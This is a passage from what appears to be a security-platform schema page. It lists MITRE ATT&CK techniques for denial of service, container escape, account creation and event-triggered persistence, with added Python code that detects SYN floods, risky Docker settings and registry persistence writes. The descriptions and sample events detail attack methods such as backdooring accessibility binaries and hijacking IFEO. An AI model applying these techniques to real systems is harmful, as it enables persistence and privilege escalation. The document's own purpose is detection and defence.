confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational
requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to
eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted
service.(Citation: Corero SYN-ACKflood) https://attack.mitre.org/techniques/T1499/001
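The SYN-flood behaviour described under T1499.001 above, as an added detection example that is not part of the XSIAM schema page or of MITRE's text: it summarises TCP records per destination and flags destinations where a large share of SYNs never complete the handshake. The record layout, the constructed sample traffic and the thresholds are assumptions made for the example.

```python
from collections import defaultdict

# Added example (not from the XSIAM schema page). Record format is an assumption:
# (timestamp_seconds, src_ip, dst_ip, dst_port, tcp_flags) with flags "S" (bare SYN),
# "SA" (SYN-ACK) or "A" (ACK), as a packet summariser might emit.


def _handshake(ts, client, server, port):
    """Constructed three-way handshake: client SYN, server SYN-ACK, client ACK."""
    return [
        (ts, client, server, port, "S"),
        (ts + 0.01, server, client, 50000, "SA"),
        (ts + 0.02, client, server, port, "A"),
    ]


# Constructed traffic: five completed handshakes, then 60 bare SYNs from distinct
# (spoofed) sources against 10.0.0.5:443 that are never completed.
SAMPLE_RECORDS = (
    _handshake(1.0, "192.168.1.10", "10.0.0.5", 443)
    + _handshake(1.1, "192.168.1.11", "10.0.0.5", 443)
    + _handshake(1.2, "192.168.1.12", "10.0.0.5", 443)
    + _handshake(1.3, "192.168.1.10", "10.0.0.6", 80)
    + _handshake(1.4, "192.168.1.13", "10.0.0.6", 80)
    + [(2.0 + i * 0.01, f"203.0.113.{i + 1}", "10.0.0.5", 443, "S") for i in range(60)]
)


def summarise_handshakes(records, window_s=None):
    """Per (dst_ip, dst_port): (syn_count, half_open_sources, distinct_syn_sources).

    A source is half-open if it sent a bare SYN to that destination and no later
    plain ACK was seen from it, i.e. the handshake never completed. If window_s is
    given, only records within window_s of the newest record are considered.
    """
    records = sorted(records)
    if window_s is not None and records:
        newest = records[-1][0]
        records = [r for r in records if r[0] >= newest - window_s]
    syn_count = defaultdict(int)
    syn_sources = defaultdict(set)
    acked_sources = defaultdict(set)
    for _ts, src, dst, dport, flags in records:
        key = (dst, dport)
        if flags == "S":
            syn_count[key] += 1
            syn_sources[key].add(src)
        elif flags == "A" and src in syn_sources[key]:
            acked_sources[key].add(src)
    return {
        key: (syn_count[key], len(syn_sources[key] - acked_sources[key]), len(syn_sources[key]))
        for key in syn_count
    }


def detect_syn_flood(records, min_syns=50, min_half_open_ratio=0.8, window_s=None):
    """Return the (dst_ip, dst_port) pairs whose SYN volume and half-open ratio both
    exceed the (assumed) thresholds, sorted for stable output."""
    flagged = []
    for key, (syns, half_open, _distinct) in summarise_handshakes(records, window_s).items():
        if syns >= min_syns and half_open / syns >= min_half_open_ratio:
            flagged.append(key)
    return sorted(flagged)


if __name__ == "__main__":
    for key, stats in sorted(summarise_handshakes(SAMPLE_RECORDS).items()):
        print(key, stats)
    print("SYN flood candidates:", detect_syn_flood(SAMPLE_RECORDS))
```

The half-open ratio matters more than raw SYN volume: a busy but healthy service also sees many SYNs, but almost all of them are followed by a client ACK. Sizing `window_s` to the listen-backlog timeout of the target OS keeps the count aligned with what the kernel is actually holding in its state table.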
T1499.002 XDM_CONST.MITRE_TECHNIQUE_ENDPOINT_DENIAL_OF_SERVICE_SERVICE_EXHAUSTION_FLOOD Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries
often target DNS and web services, however others have been targeted as well.(Citation: Arbor
AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of
which apply generally while others are specific to the software being used to provide the service. One
example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number
of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood
relies on raw volume to accomplish the objective, exhausting any of the various resources required by the
victim software to provide the service.(Citation: Cloudflare HTTPflood) Another variation, known as a SSL
renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite
includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent
secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto
algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to
make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in
computation cycles, this can cause an impact to the availability of the service when done in volume.
(Citation: Arbor SSLDoS April 2012) https://attack.mitre.org/techniques/T1499/002
T1611 XDM_CONST.MITRE_TECHNIQUE_ESCAPE_TO_HOST Adversaries may break out of a container to gain access to the underlying host. This can allow an
adversary access to other containerized resources from the host level or to the host itself. In principle,
containerized resources should provide a clear separation of application functionality and be isolated from
the host environment.(Citation: Docker Overview) There are multiple ways an adversary may escape to a
host environment. Examples include creating a container configured to mount the host’s filesystem using
the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron
on the host, or utilizing a privileged container to run commands on the underlying host.(Citation: Docker
Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Adversaries may
also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as
exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.
(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary
with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally
within the environment, or setting up a command and control channel on the host.
https://attack.mitre.org/techniques/T1611
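An added audit example for T1611, not from the XSIAM page or from Docker's own tooling: it reads the JSON that `docker inspect` prints and reports the escape vectors the description names (privileged containers and bind mounts of the host filesystem), plus the host PID namespace and added capabilities. The sample inspect output is constructed, and the sensitive-path and capability lists are assumptions for illustration.

```python
import json

# Added example (not from the XSIAM schema page). Input is assumed to be the JSON
# array that `docker inspect` prints; only the fields read below are relied on.

# Host paths whose bind-mounting into a container hands over the host
# (assumption: illustrative, not exhaustive).
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/proc", "/sys", "/dev",
                        "/var/run/docker.sock", "/run/docker.sock")

# Capabilities that on their own allow mounting host filesystems, loading kernel
# code or reading host memory (assumption: illustrative set).
ESCAPE_CAPABILITIES = {"SYS_ADMIN", "SYS_MODULE", "SYS_PTRACE", "DAC_READ_SEARCH", "SYS_RAWIO"}

# Constructed inspect output for two containers; not taken from a real host.
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/web",
        "HostConfig": {"Privileged": False, "PidMode": "", "CapAdd": None},
        "Mounts": [
            {"Type": "bind", "Source": "/srv/www", "Destination": "/usr/share/nginx/html", "RW": False},
        ],
    },
    {
        "Name": "/build-agent",
        "HostConfig": {"Privileged": True, "PidMode": "host", "CapAdd": ["SYS_ADMIN", "NET_RAW"]},
        "Mounts": [
            {"Type": "bind", "Source": "/", "Destination": "/host", "RW": True},
            {"Type": "bind", "Source": "/var/run/docker.sock", "Destination": "/var/run/docker.sock", "RW": True},
            {"Type": "volume", "Name": "cache", "Source": "/var/lib/docker/volumes/cache/_data",
             "Destination": "/cache", "RW": True},
        ],
    },
])


def _under_sensitive_path(source):
    """Return the sensitive host path that `source` is or lies beneath, else None."""
    for path in SENSITIVE_HOST_PATHS:
        if path == "/":
            if source == "/":          # only the root itself, not everything under it
                return path
        elif source == path or source.startswith(path + "/"):
            return path
    return None


def audit_container(cfg):
    """Return a list of (finding, detail) tuples describing host-escape vectors."""
    findings = []
    host = cfg.get("HostConfig", {})
    if host.get("Privileged"):
        findings.append(("privileged", "all capabilities, no device cgroup restrictions"))
    if host.get("PidMode") == "host":
        findings.append(("host_pid_namespace", "can see and ptrace host processes"))
    for cap in host.get("CapAdd") or []:
        name = cap.upper()
        if name.startswith("CAP_"):
            name = name[4:]
        if name in ESCAPE_CAPABILITIES:
            findings.append(("dangerous_capability", name))
    for mount in cfg.get("Mounts", []):
        if mount.get("Type") != "bind":  # named volumes live under the daemon's own tree
            continue
        if _under_sensitive_path(mount.get("Source", "")):
            mode = "rw" if mount.get("RW") else "ro"
            findings.append(("host_bind_mount", f"{mount['Source']} -> {mount['Destination']} ({mode})"))
    return findings


def audit_inspect_output(text):
    """Map container name -> findings for every container in a `docker inspect` dump."""
    return {c["Name"]: audit_container(c) for c in json.loads(text)}


if __name__ == "__main__":
    for name, findings in audit_inspect_output(SAMPLE_INSPECT).items():
        print(name, findings or "clean")
```

Run it against `docker inspect $(docker ps -q)` on a host under review. A read-only bind mount of `/etc` is still reported because it exposes credentials and host configuration, even though it does not by itself allow writing the cron entries the description mentions.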
T1585 XDM_CONST.MITRE_TECHNIQUE_ESTABLISH_ACCOUNTS Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries
can create accounts that can be used to build a persona to further operations. Persona development
consists of the development of public information, presence, history and appropriate affiliations. This
development could be applied to social media, website, or other publicly available information that could be
referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.
(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) For operations incorporating social
engineering, the utilization of an online persona may be important. These personas may be fictitious or
impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook,
LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of
additional documentation to make them seem real. This could include filling out profile information,
developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation:
BlackHatRobinSage) Establishing accounts can also include the creation of accounts with email providers,
which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or
[Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)
https://attack.mitre.org/techniques/T1585
T1585.002 XDM_CONST.MITRE_TECHNIQUE_ESTABLISH_ACCOUNTS_EMAIL_ACCOUNTS Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts
created with email providers to further their operations, such as leveraging them to conduct [Phishing for
Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/
T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email
account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to
increase the chance of success of follow-on behaviors. Created email accounts can also be used in the
acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation:
Mandiant APT1) To decrease the chance of physically tying back operations to themselves, adversaries
may make use of disposable email services.(Citation: Trend Micro R980 2016)
https://attack.mitre.org/techniques/T1585/002
T1585.001 XDM_CONST.MITRE_TECHNIQUE_ESTABLISH_ACCOUNTS_SOCIAL_MEDIA_ACCOUNTS Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries
can create social media accounts that can be used to build a persona to further operations. Persona
development consists of the development of public information, presence, history and appropriate
affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) For operations incorporating
social engineering, the utilization of a persona on social media may be important. These personas may be
fictitious or impersonate real people. The persona may exist on a single social media site or across multiple
sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require
development of additional documentation to make them seem real. This could include filling out profile
information, developing social networks, or incorporating photos. Once a persona has been developed an
adversary can use it to create connections to targets of interest. These connections may be direct or may
include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial
Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).
https://attack.mitre.org/techniques/T1585/001
T1546 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger
execution based on specific events. Various operating systems have means to monitor and subscribe to
events such as logons or other user activity such as running specific applications/binaries. Adversaries may
abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing
malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to
point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye
WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware) Since the execution can be
proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may
be able to abuse these triggered execution mechanisms to escalate their privileges.
https://attack.mitre.org/techniques/T1546
T1546.008 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_ACCESSIBILITY_FEATURES Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered
by accessibility features. Windows contains accessibility features that may be launched with a key
combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary
can modify the way these programs are launched to get a command prompt or backdoor without logging in
to the system. Two common accessibility programs are C:\Windows\System32\sethc.exe, launched
when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the
Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and
has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation:
FireEye Hikit Rootkit) Depending on the version of Windows, an adversary may take advantage of these
features in different ways. Common methods used by adversaries include replacing accessibility feature
binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the
replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and
it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky
Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012)
debugger method was likely discovered as a potential workaround because it does not require the
corresponding accessibility feature binary to be replaced. For simple binary replacement on Windows XP
and later as well as Windows Server 2003/R2 and later, for example, the program (e.g.,
C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides
backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting
at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/
T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016
Sticky Keys)(Citation: Narrator Accessibility Abuse)
* On-Screen Keyboard: C:\Windows\System32\osk.exe
* Magnifier: C:\Windows\System32\Magnify.exe
* Narrator: C:\Windows\System32\Narrator.exe
* Display Switcher: C:\Windows\System32\DisplaySwitch.exe
* App Switcher: C:\Windows\System32\AtBroker.exe
https://attack.mitre.org/techniques/T1546/008
T1546.009 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_APPCERT_DLLS Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered
by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the
AppCertDLLs Registry key under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session
Manager\ are loaded into every process that calls the ubiquitously used application programming interface
(API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW,
CreateProcessWithTokenW, or WinExec. (Citation: Elastic Process Injection July 2017) Similar to [Process
Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges
by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity.
https://attack.mitre.org/techniques/T1546/009
T1546.010 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_APPINIT_DLLS Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered
by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the
AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Windows or HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows
NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll. In practice
this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection
July 2017) Similar to Process Injection, these values can be abused to obtain elevated privileges by
causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
(Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being
triggered by API activity. The AppInit DLL functionality is disabled in Windows 8 and later versions when
secure boot is enabled. (Citation: AppInit Secure Boot) https://attack.mitre.org/techniques/T1546/010
T1546.011 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_APPLICATION_SHIMMING Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered
by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework
(Application Shim) was created to allow for backward compatibility of software as the operating system
codebase changes over time. For example, the application shimming feature allows developers to apply
fixes to applications (without rewriting code) that were created for Windows XP so that it will work with
Windows 10. (Citation: Elastic Process Injection July 2017) Within the framework, shims are created to act
as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS.
When a program is executed, the shim cache is referenced to determine if the program requires the use of
the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order
to communicate with the OS. A list of all shims currently installed by the default Windows installer
(sdbinst.exe) is kept in:
* %WINDIR%\AppPatch\sysmain.sdb and
* hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb
Custom databases are stored in:
* %WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom and
* hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom
To keep shims
secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have
administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account
Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes
(InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling
(DisableSEH), and intercept memory addresses (GetProcAddress). Utilizing these shims may allow an
adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses
like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to
establish persistence by continuously being invoked by affected programs.
https://attack.mitre.org/techniques/T1546/011
T1546.001 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_CHANGE_DEFAULT_FILE_ASSOCIATION Adversaries may establish persistence by executing malicious content triggered by a file type association.
When a file is opened, the default program used to open the file (also called the file association or handler)
is checked. File association selections are stored in the Windows Registry and can be edited by users,
administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs)
(Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft
Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary
program when a file with the given extension is opened. System file associations are listed under
HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a
handler for that extension located at HKEY_CLASSES_ROOT\[handler]. The various commands are then
listed as subkeys underneath the shell key at
HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example:
* HKEY_CLASSES_ROOT\txtfile\shell\open\command
* HKEY_CLASSES_ROOT\txtfile\shell\print\command
* HKEY_CLASSES_ROOT\txtfile\shell\printto\command
The values of the keys listed are commands that
are executed when the handler opens the file extension. Adversaries can modify these values to continually
execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)
https://attack.mitre.org/techniques/T1546/001
T1546.015 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_COMPONENT_OBJECT_MODEL_HIJACKING Adversaries may establish persistence by executing malicious content triggered by hijacked references to
Component Object Model (COM) objects. COM is a system within Windows to enable interaction between
software components through the operating system.(Citation: Microsoft Component Object Model)
References to various COM objects are stored in the Registry. Adversaries can use the COM system to
insert malicious code that can be executed in place of legitimate software through hijacking the COM
references and relationships as a means for persistence. Hijacking a COM object requires a change in the
Registry to replace a reference to a legitimate system component which may cause that component to not
work when executed. When that system component is executed through normal system operation the
adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack
objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to
break noticeable functionality within the system as to avoid system instability that could lead to detection.
https://attack.mitre.org/techniques/T1546/015
T1546.014 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_EMOND Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the
Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/
T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes
action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory
and take action once an explicitly defined event takes place. The rule files are in the plist format and define
the name, event type, and action to take. Some examples of event types include system startup and user
authentication. Examples of actions are to run a system command or send an email. The emond service
will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients,
specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at
/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation:
magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may abuse this
service by writing a rule to execute commands when a defined event occurs, such as system start up or
user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation:
sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from
administrator to root as the emond service is executed with root privileges by the
[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
https://attack.mitre.org/techniques/T1546/014
T1546.012 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_IMAGE_FILE_EXECUTION_OPTIONS_INJECTION Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered
by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an
application. When a process is created, a debugger present in an application’s IFEO will be prepended to
the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe
-g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) IFEOs can be set directly via the Registry
or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as
Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\<executable> where <executable> is the binary on which the
debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010) IFEOs can also enable an arbitrary
monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by
itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation:
Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags
and/or by directly modifying IFEO and silent process exit Registry values in
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\.
(Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to
[Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well
as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another
program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe).
After the Registry is modified, pressing the appropriate key combination at the login screen while at the
keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/
T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury
2014) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be
abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context
of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO
mechanisms may also provide Persistence via continuous triggered invocation. Malware may also use
IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that
redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon)
(Citation: Symantec Ushedix June 2008) https://attack.mitre.org/techniques/T1546/012
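An added detection example, not part of the XSIAM page, covering the Registry-based triggers described above: T1546.001 (file association commands), T1546.007 (Netsh helper DLLs), T1546.008 (accessibility features, here hooked through IFEO), T1546.009 (AppCert DLLs), T1546.010 (AppInit DLLs) and T1546.012 (IFEO debuggers and silent-process-exit monitors). It classifies registry value-set events against the key paths those descriptions name. The event dictionary shape (Sysmon Event ID 13 style, with TargetObject and Details) and the sample events are constructed assumptions.

```python
import re

# Added example (not from the XSIAM schema page). Events are assumed to look like
# Sysmon Event ID 13 (RegistryEvent: Value Set) with at least TargetObject and Details;
# the sample events below are constructed, not captured from a real host.

# Accessibility binaries named on this page (T1546.008); matched case-insensitively.
ACCESSIBILITY_BINARIES = {
    "sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
    "narrator.exe", "displayswitch.exe", "atbroker.exe",
}

# (technique, regex over TargetObject). Wow6432Node variants match because the
# patterns anchor on the tail of the path rather than on the hive root.
RULES = [
    ("T1546.012", re.compile(
        r"\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\(?P<exe>[^\\]+)\\Debugger$", re.I)),
    ("T1546.012", re.compile(
        r"\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\(?P<exe>[^\\]+)\\MonitorProcess$", re.I)),
    ("T1546.010", re.compile(
        r"\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\(?:Load)?AppInit_DLLs$", re.I)),
    ("T1546.009", re.compile(
        r"\\CurrentControlSet\\Control\\Session Manager\\AppCertDlls\\[^\\]+$", re.I)),
    ("T1546.001", re.compile(
        r"(?:\\Classes\\|^HKCR\\)[^\\]+\\shell\\[^\\]+\\command\\\(Default\)$", re.I)),
    ("T1546.007", re.compile(r"\\Microsoft\\Netsh\\[^\\]+$", re.I)),
]


def classify_registry_event(event):
    """Return (technique_id, summary) for a suspicious value-set event, else None."""
    target = event.get("TargetObject", "")
    details = event.get("Details", "")
    for technique, pattern in RULES:
        m = pattern.search(target)
        if not m:
            continue
        if technique == "T1546.010" and details in ("", "0"):
            return None  # clearing AppInit_DLLs / disabling LoadAppInit_DLLs loads nothing
        exe = m.groupdict().get("exe")
        if exe and exe.lower() in ACCESSIBILITY_BINARIES:
            # IFEO used to hook a logon-screen accessibility binary: T1546.008 via T1546.012
            return ("T1546.008", f"{exe} hooked via IFEO -> {details}")
        return (technique, f"{target} = {details}")
    return None


def scan_events(events):
    """Return [(technique_id, TargetObject), ...] for every event that matched a rule."""
    hits = []
    for event in events:
        result = classify_registry_event(event)
        if result:
            hits.append((result[0], event["TargetObject"]))
    return hits


SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger",
     "Details": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Users\Public\stage.exe",
     "TargetObject": r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs",
     "Details": r"C:\Users\Public\hook.dll"},
    {"Image": r"C:\Users\Public\stage.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Session Manager\AppCertDlls\upd",
     "Details": r"C:\Users\Public\cert.dll"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Classes\txtfile\shell\open\command\(Default)",
     "Details": r"C:\Users\Public\viewer.exe %1"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Netsh\helper",
     "Details": r"C:\Users\Public\helper.dll"},
    {"Image": r"C:\Program Files\Vendor\setup.exe",  # a Run key: none of the rules above apply
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdater",
     "Details": r"C:\Program Files\Vendor\updater.exe"},
    {"Image": r"C:\Windows\System32\gflags.exe",  # debugger on a non-accessibility binary
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe\Debugger",
     "Details": r"C:\dbg\ntsd.exe -g"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\MonitorProcess",
     "Details": r"C:\Users\Public\monitor.exe"},
]

if __name__ == "__main__":
    for technique, target in scan_events(SAMPLE_EVENTS):
        print(technique, target)
```

The rules key on the value being written, not on the writing process, because these keys are legitimately touched by GFlags, installers and group policy; the `Image` field is carried through so a downstream rule can whitelist known deployment tooling without weakening the path match.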
T1546.006 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_LC_LOAD_DYLIB_ADDITION Adversaries may establish persistence by executing malicious content triggered by the execution of tainted
binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a
binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic
libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long
as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for
OSX) There are tools available to perform these changes. Adversaries may modify Mach-O binary headers
to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate
digital signatures on binaries because the binary is being modified, this can be remediated by simply
removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load
time. (Citation: Malware Persistence on OS X) https://attack.mitre.org/techniques/T1546/006
T1546.007 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_NETSH_HELPER_DLL Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs.
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network
configuration of a system. It contains functionality to add helper DLLs for extending functionality of the
utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the
Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. Adversaries can use netsh.exe helper DLLs to
trigger execution of arbitrary code in a persistent manner. This execution would take place anytime
netsh.exe is executed, which could happen automatically, with another persistence technique, or if other
software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.
(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
https://attack.mitre.org/techniques/T1546/007
T1546.013 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_POWERSHELL_PROFILE Adversaries may gain persistence and elevate privileges by executing malicious content triggered by
PowerShell profiles. A PowerShell profile (profile.ps1) is a script that runs when
[PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to
customize user environments. [PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several
profiles depending on the user or host program. For example, there can be different profiles for
[PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console,
PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users
